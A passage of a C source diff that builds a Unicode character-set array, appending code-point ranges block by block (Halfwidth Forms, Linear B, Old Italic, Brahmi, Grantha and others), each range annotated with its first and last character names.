+	while (c <= 0xfe19)	// ..to PRESENTATION FORM FOR VERTICAL HORIZONTAL ELLIPSIS
+		charset[i++] = c++;
+// FE20..FE2F; Combining Half Marks
+	c = 0xfe20;		// from COMBINING LIGATURE LEFT HALF
+	while (c <= 0xfe2f)	// ..to COMBINING CYRILLIC TITLO RIGHT HALF
+		charset[i++] = c++;
+// FE30..FE4F; CJK Compatibility Forms
+	c = 0xfe30;		// from PRESENTATION FORM FOR VERTICAL TWO DOT LEADER
+	while (c <= 0xfe4f)	// ..to WAVY LOW LINE
+		charset[i++] = c++;
+// FE50..FE6F; Small Form Variants
+	charset[i++] = 0xfe50;	// SMALL COMMA
+	charset[i++] = 0xfe52;	// SMALL FULL STOP
+	c = 0xfe54;		// from SMALL SEMICOLON
+	while (c <= 0xfe66)	// ..to SMALL EQUALS SIGN
+		charset[i++] = c++;
+	c = 0xfe68;		// from SMALL REVERSE SOLIDUS
+	while (c <= 0xfe6b)	// ..to SMALL COMMERCIAL AT
+		charset[i++] = c++;
+// FE70..FEFF; Arabic Presentation Forms-B
+	c = 0xfe70;		// from ARABIC FATHATAN ISOLATED FORM
+	while (c <= 0xfe74)	// ..to ARABIC KASRATAN ISOLATED FORM
+		charset[i++] = c++;
+	c = 0xfe76;		// from ARABIC FATHA ISOLATED FORM
+	while (c <= 0xfefc)	// ..to ARABIC LIGATURE LAM WITH ALEF FINAL FORM
+		charset[i++] = c++;
+	charset[i++] = 0xfeff;	// ZERO WIDTH NO-BREAK SPACE
+// FF00..FFEF; Halfwidth and Fullwidth Forms
+	c = 0xff01;		// from FULLWIDTH EXCLAMATION MARK
+	while (c <= 0xffbe)	// ..to HALFWIDTH HANGUL LETTER HIEUH
+		charset[i++] = c++;
+	c = 0xffc2;		// from HALFWIDTH HANGUL LETTER A
+	while (c <= 0xffc7)	// ..to HALFWIDTH HANGUL LETTER E
+		charset[i++] = c++;
+	c = 0xffca;		// from HALFWIDTH HANGUL LETTER YEO
+	while (c <= 0xffcf)	// ..to HALFWIDTH HANGUL LETTER OE
+		charset[i++] = c++;
+	c = 0xffd2;		// from HALFWIDTH HANGUL LETTER YO
+	while (c <= 0xffd7)	// ..to HALFWIDTH HANGUL LETTER YU
+		charset[i++] = c++;
+	charset[i++] = 0xffda;	// HALFWIDTH HANGUL LETTER EU
+	charset[i++] = 0xffdc;	// HALFWIDTH HANGUL LETTER I
+	c = 0xffe0;		// from FULLWIDTH CENT SIGN
+	while (c <= 0xffe6)	// ..to FULLWIDTH WON SIGN
+		charset[i++] = c++;
+	c = 0xffe8;		// from HALFWIDTH FORMS LIGHT VERTICAL
+	while (c <= 0xffee)	// ..to HALFWIDTH WHITE CIRCLE
+		charset[i++] = c++;
+// FFF0..FFFF; Specials
+	c = 0xfff9;		// from INTERLINEAR ANNOTATION ANCHOR
+	while (c <= 0xfffd)	// ..to REPLACEMENT CHARACTER
+		charset[i++] = c++;
+// 10000..1007F; Linear B Syllabary
+	c = 0x10000;		// from LINEAR B SYLLABLE B008 A
+	while (c <= 0x1000b)	// ..to LINEAR B SYLLABLE B046 JE
+		charset[i++] = c++;
+	c = 0x1000d;		// from LINEAR B SYLLABLE B036 JO
+	while (c <= 0x10026)	// ..to LINEAR B SYLLABLE B032 QO
+		charset[i++] = c++;
+	c = 0x10028;		// from LINEAR B SYLLABLE B060 RA
+	while (c <= 0x1003a)	// ..to LINEAR B SYLLABLE B042 WO
+		charset[i++] = c++;
+	charset[i++] = 0x1003c;	// LINEAR B SYLLABLE B017 ZA
+	charset[i++] = 0x1003d;	// LINEAR B SYLLABLE B074 ZE
+	c = 0x1003f;		// from LINEAR B SYLLABLE B020 ZO
+	while (c <= 0x1004d)	// ..to LINEAR B SYLLABLE B091 TWO
+		charset[i++] = c++;
+	c = 0x10050;		// from LINEAR B SYMBOL B018
+	while (c <= 0x1005d)	// ..to LINEAR B SYMBOL B089
+		charset[i++] = c++;
+// 10080..100FF; Linear B Ideograms
+	c = 0x10080;		// from LINEAR B IDEOGRAM B100 MAN
+	while (c <= 0x100fa)	// ..to LINEAR B IDEOGRAM VESSEL B305
+		charset[i++] = c++;
+// 10100..1013F; Aegean Numbers
+	charset[i++] = 0x10100;	// AEGEAN WORD SEPARATOR LINE
+	charset[i++] = 0x10102;	// AEGEAN CHECK MARK
+	c = 0x10107;		// from AEGEAN NUMBER ONE
+	while (c <= 0x10133)	// ..to AEGEAN NUMBER NINETY THOUSAND
+		charset[i++] = c++;
+	c = 0x10137;		// from AEGEAN WEIGHT BASE UNIT
+	while (c <= 0x1013f)	// ..to AEGEAN MEASURE THIRD SUBUNIT
+		charset[i++] = c++;
+// 10140..1018F; Ancient Greek Numbers
+	c = 0x10140;		// from GREEK ACROPHONIC ATTIC ONE QUARTER
+	while (c <= 0x1018e)	// ..to NOMISMA SIGN
+		charset[i++] = c++;
+// 10190..101CF; Ancient Symbols
+	c = 0x10190;		// from ROMAN SEXTANS SIGN
+	while (c <= 0x1019b)	// ..to ROMAN CENTURIAL SIGN
+		charset[i++] = c++;
+	charset[i++] = 0x101a0;	// GREEK SYMBOL TAU RHO
+// 101D0..101FF; Phaistos Disc
+	c = 0x101d0;		// from PHAISTOS DISC SIGN PEDESTRIAN
+	while (c <= 0x101fd)	// ..to PHAISTOS DISC SIGN COMBINING OBLIQUE STROKE
+		charset[i++] = c++;
+// 10280..1029F; Lycian
+	c = 0x10280;		// from LYCIAN LETTER A
+	while (c <= 0x1029c)	// ..to LYCIAN LETTER X
+		charset[i++] = c++;
+// 102A0..102DF; Carian
+	c = 0x102a0;		// from CARIAN LETTER A
+	while (c <= 0x102d0)	// ..to CARIAN LETTER UUU3
+		charset[i++] = c++;
+// 102E0..102FF; Coptic Epact Numbers
+	c = 0x102e0;		// from COPTIC EPACT THOUSANDS MARK
+	while (c <= 0x102fb)	// ..to COPTIC EPACT NUMBER NINE HUNDRED
+		charset[i++] = c++;
+// 10300..1032F; Old Italic
+	c = 0x10300;		// from OLD ITALIC LETTER A
+	while (c <= 0x10323)	// ..to OLD ITALIC NUMERAL FIFTY
+		charset[i++] = c++;
+	charset[i++] = 0x1032d;	// OLD ITALIC LETTER YE
+	charset[i++] = 0x1032f;	// OLD ITALIC LETTER SOUTHERN TSE
+// 10330..1034F; Gothic
+	c = 0x10330;		// from GOTHIC LETTER AHSA
+	while (c <= 0x1034a)	// ..to GOTHIC LETTER NINE HUNDRED
+		charset[i++] = c++;
+// 10350..1037F; Old Permic
+	c = 0x10350;		// from OLD PERMIC LETTER AN
+	while (c <= 0x1037a)	// ..to COMBINING OLD PERMIC LETTER SII
+		charset[i++] = c++;
+// 10380..1039F; Ugaritic
+	c = 0x10380;		// from UGARITIC LETTER ALPA
+	while (c <= 0x1039d)	// ..to UGARITIC LETTER SSU
+		charset[i++] = c++;
+	charset[i++] = 0x1039f;	// UGARITIC WORD DIVIDER
+// 103A0..103DF; Old Persian
+	c = 0x103a0;		// from OLD PERSIAN SIGN A
+	while (c <= 0x103c3)	// ..to OLD PERSIAN SIGN HA
+		charset[i++] = c++;
+	c = 0x103c8;		// from OLD PERSIAN SIGN AURAMAZDAA
+	while (c <= 0x103d5)	// ..to OLD PERSIAN NUMBER HUNDRED
+		charset[i++] = c++;
+// 10400..1044F; Deseret
+	c = 0x10400;		// from DESERET CAPITAL LETTER LONG I
+	while (c <= 0x1044f)	// ..to DESERET SMALL LETTER EW
+		charset[i++] = c++;
+// 10450..1047F; Shavian
+	c = 0x10450;		// from SHAVIAN LETTER PEEP
+	while (c <= 0x1047f)	// ..to SHAVIAN LETTER YEW
+		charset[i++] = c++;
+// 10480..104AF; Osmanya
+	c = 0x10480;		// from OSMANYA LETTER ALEF
+	while (c <= 0x1049d)	// ..to OSMANYA LETTER OO
+		charset[i++] = c++;
+	c = 0x104a0;		// from OSMANYA DIGIT ZERO
+	while (c <= 0x104a9)	// ..to OSMANYA DIGIT NINE
+		charset[i++] = c++;
+// 104B0..104FF; Osage
+	c = 0x104b0;		// from OSAGE CAPITAL LETTER A
+	while (c <= 0x104d3)	// ..to OSAGE CAPITAL LETTER ZHA
+		charset[i++] = c++;
+	c = 0x104d8;		// from OSAGE SMALL LETTER A
+	while (c <= 0x104fb)	// ..to OSAGE SMALL LETTER ZHA
+		charset[i++] = c++;
+// 10500..1052F; Elbasan
+	c = 0x10500;		// from ELBASAN LETTER A
+	while (c <= 0x10527)	// ..to ELBASAN LETTER KHE
+		charset[i++] = c++;
+// 10530..1056F; Caucasian Albanian
+	c = 0x10530;		// from CAUCASIAN ALBANIAN LETTER ALT
+	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
+		charset[i++] = c++;
+	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10600..1077F; Linear A
+	c = 0x10600;		// from LINEAR A SIGN AB001
+	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
+		charset[i++] = c++;
+	c = 0x10740;		// from LINEAR A SIGN A701 A
+	while (c <= 0x10755)	// ..to LINEAR A SIGN A732 JE
+		charset[i++] = c++;
+	c = 0x10760;		// from LINEAR A SIGN A800
+	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
+		charset[i++] = c++;
+// 10800..1083F; Cypriot Syllabary
+	c = 0x10800;		// from CYPRIOT SYLLABLE A
+	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
+		charset[i++] = c++;
+	c = 0x1080a;		// from CYPRIOT SYLLABLE KA
+	while (c <= 0x10835)	// ..to CYPRIOT SYLLABLE WO
+		charset[i++] = c++;
+	charset[i++] = 0x10837;	// CYPRIOT SYLLABLE XA
+	charset[i++] = 0x10838;	// CYPRIOT SYLLABLE XE
+	c = 0x1083c;		// from CYPRIOT SYLLABLE ZA
+	while (c <= 0x1083f)	// ..to CYPRIOT SYLLABLE ZO
+		charset[i++] = c++;
+// 10840..1085F; Imperial Aramaic
+	c = 0x10840;		// from IMPERIAL ARAMAIC LETTER ALEPH
+	while (c <= 0x10855)	// ..to IMPERIAL ARAMAIC LETTER TAW
+		charset[i++] = c++;
+	c = 0x10857;		// from IMPERIAL ARAMAIC SECTION SIGN
+	while (c <= 0x1085f)	// ..to IMPERIAL ARAMAIC NUMBER TEN THOUSAND
+		charset[i++] = c++;
+// 10860..1087F; Palmyrene
+	c = 0x10860;		// from PALMYRENE LETTER ALEPH
+	while (c <= 0x1087f)	// ..to PALMYRENE NUMBER TWENTY
+		charset[i++] = c++;
+// 10880..108AF; Nabataean
+	c = 0x10880;		// from NABATAEAN LETTER FINAL ALEPH
+	while (c <= 0x1089e)	// ..to NABATAEAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x108a7;		// from NABATAEAN NUMBER ONE
+	while (c <= 0x108af)	// ..to NABATAEAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 108E0..108FF; Hatran
+	c = 0x108e0;		// from HATRAN LETTER ALEPH
+	while (c <= 0x108f2)	// ..to HATRAN LETTER QOPH
+		charset[i++] = c++;
+	charset[i++] = 0x108f4;	// HATRAN LETTER SHIN
+	charset[i++] = 0x108f5;	// HATRAN LETTER TAW
+	c = 0x108fb;		// from HATRAN NUMBER ONE
+	while (c <= 0x108ff)	// ..to HATRAN NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10900..1091F; Phoenician
+	c = 0x10900;		// from PHOENICIAN LETTER ALF
+	while (c <= 0x1091b)	// ..to PHOENICIAN NUMBER THREE
+		charset[i++] = c++;
+	charset[i++] = 0x1091f;	// PHOENICIAN WORD SEPARATOR
+// 10920..1093F; Lydian
+	c = 0x10920;		// from LYDIAN LETTER A
+	while (c <= 0x10939)	// ..to LYDIAN LETTER C
+		charset[i++] = c++;
+	charset[i++] = 0x1093f;	// LYDIAN TRIANGULAR MARK
+// 10980..1099F; Meroitic Hieroglyphs
+	c = 0x10980;		// from MEROITIC HIEROGLYPHIC LETTER A
+	while (c <= 0x1099f)	// ..to MEROITIC HIEROGLYPHIC SYMBOL VIDJ-2
+		charset[i++] = c++;
+// 109A0..109FF; Meroitic Cursive
+	c = 0x109a0;		// from MEROITIC CURSIVE LETTER A
+	while (c <= 0x109b7)	// ..to MEROITIC CURSIVE LETTER DA
+		charset[i++] = c++;
+	c = 0x109bc;		// from MEROITIC CURSIVE FRACTION ELEVEN TWELFTHS
+	while (c <= 0x109cf)	// ..to MEROITIC CURSIVE NUMBER SEVENTY
+		charset[i++] = c++;
+	c = 0x109d2;		// from MEROITIC CURSIVE NUMBER ONE HUNDRED
+	while (c <= 0x109ff)	// ..to MEROITIC CURSIVE FRACTION TEN TWELFTHS
+		charset[i++] = c++;
+// 10A00..10A5F; Kharoshthi
+	c = 0x10a00;		// from KHAROSHTHI LETTER A
+	while (c <= 0x10a03)	// ..to KHAROSHTHI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x10a05;	// KHAROSHTHI VOWEL SIGN E
+	charset[i++] = 0x10a06;	// KHAROSHTHI VOWEL SIGN O
+	c = 0x10a0c;		// from KHAROSHTHI VOWEL LENGTH MARK
+	while (c <= 0x10a13)	// ..to KHAROSHTHI LETTER GHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a15;	// KHAROSHTHI LETTER CA
+	charset[i++] = 0x10a17;	// KHAROSHTHI LETTER JA
+	c = 0x10a19;		// from KHAROSHTHI LETTER NYA
+	while (c <= 0x10a35)	// ..to KHAROSHTHI LETTER VHA
+		charset[i++] = c++;
+	charset[i++] = 0x10a38;	// KHAROSHTHI SIGN BAR ABOVE
+	charset[i++] = 0x10a3a;	// KHAROSHTHI SIGN DOT BELOW
+	c = 0x10a3f;		// from KHAROSHTHI VIRAMA
+	while (c <= 0x10a48)	// ..to KHAROSHTHI FRACTION ONE HALF
+		charset[i++] = c++;
+	c = 0x10a50;		// from KHAROSHTHI PUNCTUATION DOT
+	while (c <= 0x10a58)	// ..to KHAROSHTHI PUNCTUATION LINES
+		charset[i++] = c++;
+// 10A60..10A7F; Old South Arabian
+	c = 0x10a60;		// from OLD SOUTH ARABIAN LETTER HE
+	while (c <= 0x10a7f)	// ..to OLD SOUTH ARABIAN NUMERIC INDICATOR
+		charset[i++] = c++;
+// 10A80..10A9F; Old North Arabian
+	c = 0x10a80;		// from OLD NORTH ARABIAN LETTER HEH
+	while (c <= 0x10a9f)	// ..to OLD NORTH ARABIAN NUMBER TWENTY
+		charset[i++] = c++;
+// 10AC0..10AFF; Manichaean
+	c = 0x10ac0;		// from MANICHAEAN LETTER ALEPH
+	while (c <= 0x10ae6)	// ..to MANICHAEAN ABBREVIATION MARK BELOW
+		charset[i++] = c++;
+	c = 0x10aeb;		// from MANICHAEAN NUMBER ONE
+	while (c <= 0x10af6)	// ..to MANICHAEAN PUNCTUATION LINE FILLER
+		charset[i++] = c++;
+// 10B00..10B3F; Avestan
+	c = 0x10b00;		// from AVESTAN LETTER A
+	while (c <= 0x10b35)	// ..to AVESTAN LETTER HE
+		charset[i++] = c++;
+	c = 0x10b39;		// from AVESTAN ABBREVIATION MARK
+	while (c <= 0x10b3f)	// ..to LARGE ONE RING OVER TWO RINGS PUNCTUATION
+		charset[i++] = c++;
+// 10B40..10B5F; Inscriptional Parthian
+	c = 0x10b40;		// from INSCRIPTIONAL PARTHIAN LETTER ALEPH
+	while (c <= 0x10b55)	// ..to INSCRIPTIONAL PARTHIAN LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b58;		// from INSCRIPTIONAL PARTHIAN NUMBER ONE
+	while (c <= 0x10b5f)	// ..to INSCRIPTIONAL PARTHIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B60..10B7F; Inscriptional Pahlavi
+	c = 0x10b60;		// from INSCRIPTIONAL PAHLAVI LETTER ALEPH
+	while (c <= 0x10b72)	// ..to INSCRIPTIONAL PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b78;		// from INSCRIPTIONAL PAHLAVI NUMBER ONE
+	while (c <= 0x10b7f)	// ..to INSCRIPTIONAL PAHLAVI NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10B80..10BAF; Psalter Pahlavi
+	c = 0x10b80;		// from PSALTER PAHLAVI LETTER ALEPH
+	while (c <= 0x10b91)	// ..to PSALTER PAHLAVI LETTER TAW
+		charset[i++] = c++;
+	c = 0x10b99;		// from PSALTER PAHLAVI SECTION MARK
+	while (c <= 0x10b9c)	// ..to PSALTER PAHLAVI FOUR DOTS WITH DOT
+		charset[i++] = c++;
+	c = 0x10ba9;		// from PSALTER PAHLAVI NUMBER ONE
+	while (c <= 0x10baf)	// ..to PSALTER PAHLAVI NUMBER ONE HUNDRED
+		charset[i++] = c++;
+// 10C00..10C4F; Old Turkic
+	c = 0x10c00;		// from OLD TURKIC LETTER ORKHON A
+	while (c <= 0x10c48)	// ..to OLD TURKIC LETTER ORKHON BASH
+		charset[i++] = c++;
+// 10C80..10CFF; Old Hungarian
+	c = 0x10c80;		// from OLD HUNGARIAN CAPITAL LETTER A
+	while (c <= 0x10cb2)	// ..to OLD HUNGARIAN CAPITAL LETTER US
+		charset[i++] = c++;
+	c = 0x10cc0;		// from OLD HUNGARIAN SMALL LETTER A
+	while (c <= 0x10cf2)	// ..to OLD HUNGARIAN SMALL LETTER US
+		charset[i++] = c++;
+	c = 0x10cfa;		// from OLD HUNGARIAN NUMBER ONE
+	while (c <= 0x10cff)	// ..to OLD HUNGARIAN NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 10D00..10D3F; Hanifi Rohingya
+	c = 0x10d00;		// from HANIFI ROHINGYA LETTER A
+	while (c <= 0x10d27)	// ..to HANIFI ROHINGYA SIGN TASSI
+		charset[i++] = c++;
+	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
+	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
+		charset[i++] = c++;
+// 10E60..10E7F; Rumi Numeral Symbols
+	c = 0x10e60;		// from RUMI DIGIT ONE
+	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
+		charset[i++] = c++;
+// 10F00..10F2F; Old Sogdian
+	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
+	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
+		charset[i++] = c++;
+// 10F30..10F6F; Sogdian
+	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
+	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
+		charset[i++] = c++;
+// 11000..1107F; Brahmi
+	c = 0x11000;		// from BRAHMI SIGN CANDRABINDU
+	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
+		charset[i++] = c++;
+	c = 0x11052;		// from BRAHMI NUMBER ONE
+	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
+// 11080..110CF; Kaithi
+	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
+	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
+// 110D0..110FF; Sora Sompeng
+	c = 0x110d0;		// from SORA SOMPENG LETTER SAH
+	while (c <= 0x110e8)	// ..to SORA SOMPENG LETTER MAE
+		charset[i++] = c++;
+	c = 0x110f0;		// from SORA SOMPENG DIGIT ZERO
+	while (c <= 0x110f9)	// ..to SORA SOMPENG DIGIT NINE
+		charset[i++] = c++;
+// 11100..1114F; Chakma
+	c = 0x11100;		// from CHAKMA SIGN CANDRABINDU
+	while (c <= 0x11134)	// ..to CHAKMA MAAYYAA
+		charset[i++] = c++;
+	c = 0x11136;		// from CHAKMA DIGIT ZERO
+	while (c <= 0x11146)	// ..to CHAKMA VOWEL SIGN EI
+		charset[i++] = c++;
+// 11150..1117F; Mahajani
+	c = 0x11150;		// from MAHAJANI LETTER A
+	while (c <= 0x11176)	// ..to MAHAJANI LIGATURE SHRI
+		charset[i++] = c++;
+// 11180..111DF; Sharada
+	c = 0x11180;		// from SHARADA SIGN CANDRABINDU
+	while (c <= 0x111cd)	// ..to SHARADA SUTRA MARK
+		charset[i++] = c++;
+	c = 0x111d0;		// from SHARADA DIGIT ZERO
+	while (c <= 0x111df)	// ..to SHARADA SECTION MARK-2
+		charset[i++] = c++;
+// 111E0..111FF; Sinhala Archaic Numbers
+	c = 0x111e1;		// from SINHALA ARCHAIC DIGIT ONE
+	while (c <= 0x111f4)	// ..to SINHALA ARCHAIC NUMBER ONE THOUSAND
+		charset[i++] = c++;
+// 11200..1124F; Khojki
+	c = 0x11200;		// from KHOJKI LETTER A
+	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
+		charset[i++] = c++;
+	c = 0x11213;		// from KHOJKI LETTER NYA
+	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+		charset[i++] = c++;
+// 11280..112AF; Multani
+	c = 0x11280;		// from MULTANI LETTER A
+	while (c <= 0x11286)	// ..to MULTANI LETTER GA
+		charset[i++] = c++;
+	c = 0x1128a;		// from MULTANI LETTER CA
+	while (c <= 0x1128d)	// ..to MULTANI LETTER JJA
+		charset[i++] = c++;
+	c = 0x1128f;		// from MULTANI LETTER NYA
+	while (c <= 0x1129d)	// ..to MULTANI LETTER BA
+		charset[i++] = c++;
+	c = 0x1129f;		// from MULTANI LETTER BHA
+	while (c <= 0x112a9)	// ..to MULTANI SECTION MARK
+		charset[i++] = c++;
+// 112B0..112FF; Khudawadi
+	c = 0x112b0;		// from KHUDAWADI LETTER A
+	while (c <= 0x112ea)	// ..to KHUDAWADI SIGN VIRAMA
+		charset[i++] = c++;
+	c = 0x112f0;		// from KHUDAWADI DIGIT ZERO
+	while (c <= 0x112f9)	// ..to KHUDAWADI DIGIT NINE
+		charset[i++] = c++;
+// 11300..1137F; Grantha
+	c = 0x11300;		// from GRANTHA SIGN COMBINING ANUSVARA ABOVE
+	while (c <= 0x11303)	// ..to GRANTHA SIGN VISARGA
+		charset[i++] = c++;
+	c = 0x11305;		// from GRANTHA LETTER A
+	while (c <= 0x1130c)	// ..to GRANTHA LETTER VOCALIC L
+		charset[i++] = c++;
+	charset[i++] = 0x1130f;	// GRANTHA LETTER EE
+	charset[i++] = 0x11310;	// GRANTHA LETTER AI
+	c = 0x11313;		// from GRANTHA LETTER OO
+	while (c <= 0x11328)	// ..to GRANTHA LETTER NA
+		charset[i++] = c++;
+	c = 0x1132a;		// from GRANTHA LETTER PA
+	while (c <= 0x11330)	// ..to GRANTHA LETTER RA
+		charset[i++] = c++;
+	charset[i++] = 0x11332;	// GRANTHA LETTER LA
+	charset[i++] = 0x11333;	// GRANTHA LETTER LLA
+	c = 0x11335;		// from GRANTHA LETTER VA
+	while (c <= 0x11339)	// ..to GRANTHA LETTER HA
+		charset[i++] = c++;
+	c = 0x1133b;		// from COMBINING BINDU BELOW
+	while (c <= 0x11344)	// ..to GRANTHA VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	charset[i++] = 0x11347;	// GRANTHA VOWEL SIGN EE
+	charset[i++] = 0x11348;	// GRANTHA VOWEL SIGN AI
+	charset[i++] = 0x1134b;	// GRANTHA VOWEL SIGN OO
+	charset[i++] = 0x1134d;	// GRANTHA SIGN VIRAMA
+	c = 0x1135d;		// from GRANTHA SIGN PLUTA
+	while (c <= 0x11363)	// ..to GRANTHA VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11366;		// from COMBINING GRANTHA DIGIT ZERO
+	while (c <= 0x1136c)	// ..to COMBINING GRANTHA DIGIT SIX
+		charset[i++] = c++;
+	c = 0x11370;		// from COMBINING GRANTHA LETTER A
+	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
+		charset[i++] = c++;
+// 11400..1147F; Newa
+	c = 0x11400;		// from NEWA LETTER A
+	while (c <= 0x11459)	// ..to NEWA DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1145d;	// NEWA INSERTION SIGN
+	charset[i++] = 0x1145e;	// NEWA SANDHI MARK
+// 11480..114DF; Tirhuta
+	c = 0x11480;		// from TIRHUTA ANJI
+	while (c <= 0x114c7)	// ..to TIRHUTA OM
+		charset[i++] = c++;
+	c = 0x114d0;		// from TIRHUTA DIGIT ZERO
+	while (c <= 0x114d9)	// ..to TIRHUTA DIGIT NINE
+		charset[i++] = c++;
+// 11580..115FF; Siddham
+	c = 0x11580;		// from SIDDHAM LETTER A
+	while (c <= 0x115b5)	// ..to SIDDHAM VOWEL SIGN VOCALIC RR
+		charset[i++] = c++;
+	c = 0x115b8;		// from SIDDHAM VOWEL SIGN E
+	while (c <= 0x115dd)	// ..to SIDDHAM VOWEL SIGN ALTERNATE UU
+		charset[i++] = c++;
+// 11600..1165F; Modi
+	c = 0x11600;		// from MODI LETTER A
+	while (c <= 0x11644)	// ..to MODI SIGN HUVA
+		charset[i++] = c++;
+	c = 0x11650;		// from MODI DIGIT ZERO
+	while (c <= 0x11659)	// ..to MODI DIGIT NINE
+		charset[i++] = c++;
+// 11660..1167F; Mongolian Supplement
+	c = 0x11660;		// from MONGOLIAN BIRGA WITH ORNAMENT
+	while (c <= 0x1166c)	// ..to MONGOLIAN TURNED SWIRL BIRGA WITH DOUBLE ORNAMENT
+		charset[i++] = c++;
+// 11680..116CF; Takri
+	c = 0x11680;		// from TAKRI LETTER A
+	while (c <= 0x116b7)	// ..to TAKRI SIGN NUKTA
+		charset[i++] = c++;
+	c = 0x116c0;		// from TAKRI DIGIT ZERO
+	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
+		charset[i++] = c++;
+// 11700..1173F; Ahom
+	c = 0x11700;		// from AHOM LETTER KA
+	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
+		charset[i++] = c++;
+	c = 0x1171d;		// from AHOM CONSONANT SIGN MEDIAL LA
+	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
+		charset[i++] = c++;
+	c = 0x11730;		// from AHOM DIGIT ZERO
+	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+		charset[i++] = c++;
+// 11800..1184F; Dogra
+	c = 0x11800;		// from DOGRA LETTER A
+	while (c <= 0x1183b)	// ..to DOGRA ABBREVIATION SIGN
+		charset[i++] = c++;
+// 118A0..118FF; Warang Citi
+	c = 0x118a0;		// from WARANG CITI CAPITAL LETTER NGAA
+	while (c <= 0x118f2)	// ..to WARANG CITI NUMBER NINETY
+		charset[i++] = c++;
+	charset[i++] = 0x118ff;	// WARANG CITI OM
+// 11A00..11A4F; Zanabazar Square
+	c = 0x11a00;		// from ZANABAZAR SQUARE LETTER A
+	while (c <= 0x11a47)	// ..to ZANABAZAR SQUARE SUBJOINER
+		charset[i++] = c++;
+// 11A50..11AAF; Soyombo
+	c = 0x11a50;		// from SOYOMBO LETTER A
+	while (c <= 0x11a83)	// ..to SOYOMBO LETTER KSSA
+		charset[i++] = c++;
+	c = 0x11a86;		// from SOYOMBO CLUSTER-INITIAL LETTER RA
+	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
+		charset[i++] = c++;
+// 11AC0..11AFF; Pau Cin Hau
+	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
+	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
+		charset[i++] = c++;
+// 11C00..11C6F; Bhaiksuki
+	c = 0x11c00;		// from BHAIKSUKI LETTER A
+	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c0a;		// from BHAIKSUKI LETTER E
+	while (c <= 0x11c36)	// ..to BHAIKSUKI VOWEL SIGN VOCALIC L
+		charset[i++] = c++;
+	c = 0x11c38;		// from BHAIKSUKI VOWEL SIGN E
+	while (c <= 0x11c45)	// ..to BHAIKSUKI GAP FILLER-2
+		charset[i++] = c++;
+	c = 0x11c50;		// from BHAIKSUKI DIGIT ZERO
+	while (c <= 0x11c6c)	// ..to BHAIKSUKI HUNDREDS UNIT MARK
+		charset[i++] = c++;
+// 11C70..11CBF; Marchen
+	c = 0x11c70;		// from MARCHEN HEAD MARK
+	while (c <= 0x11c8f)	// ..to MARCHEN LETTER A
+		charset[i++] = c++;
+	c = 0x11c92;		// from MARCHEN SUBJOINED LETTER KA
+	while (c <= 0x11ca7)	// ..to MARCHEN SUBJOINED LETTER ZA
+		charset[i++] = c++;
+	c = 0x11ca9;		// from MARCHEN SUBJOINED LETTER YA
+	while (c <= 0x11cb6)	// ..to MARCHEN SIGN CANDRABINDU
+		charset[i++] = c++;
+// 11D00..11D5F; Masaram Gondi
+	c = 0x11d00;		// from MASARAM GONDI LETTER A
+	while (c <= 0x11d06)	// ..to MASARAM GONDI LETTER E
+		charset[i++] = c++;
+	charset[i++] = 0x11d08;	// MASARAM GONDI LETTER AI
+	charset[i++] = 0x11d09;	// MASARAM GONDI LETTER O
+	c = 0x11d0b;		// from MASARAM GONDI LETTER AU
+	while (c <= 0x11d36)	// ..to MASARAM GONDI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	charset[i++] = 0x11d3c;	// MASARAM GONDI VOWEL SIGN AI
+	charset[i++] = 0x11d3d;	// MASARAM GONDI VOWEL SIGN O
+	c = 0x11d3f;		// from MASARAM GONDI VOWEL SIGN AU
+	while (c <= 0x11d47)	// ..to MASARAM GONDI RA-KARA
+		charset[i++] = c++;
+	c = 0x11d50;		// from MASARAM GONDI DIGIT ZERO
+	while (c <= 0x11d59)	// ..to MASARAM GONDI DIGIT NINE
+		charset[i++] = c++;
+// 11D60..11DAF; Gunjala Gondi
+	c = 0x11d60;		// from GUNJALA GONDI LETTER A
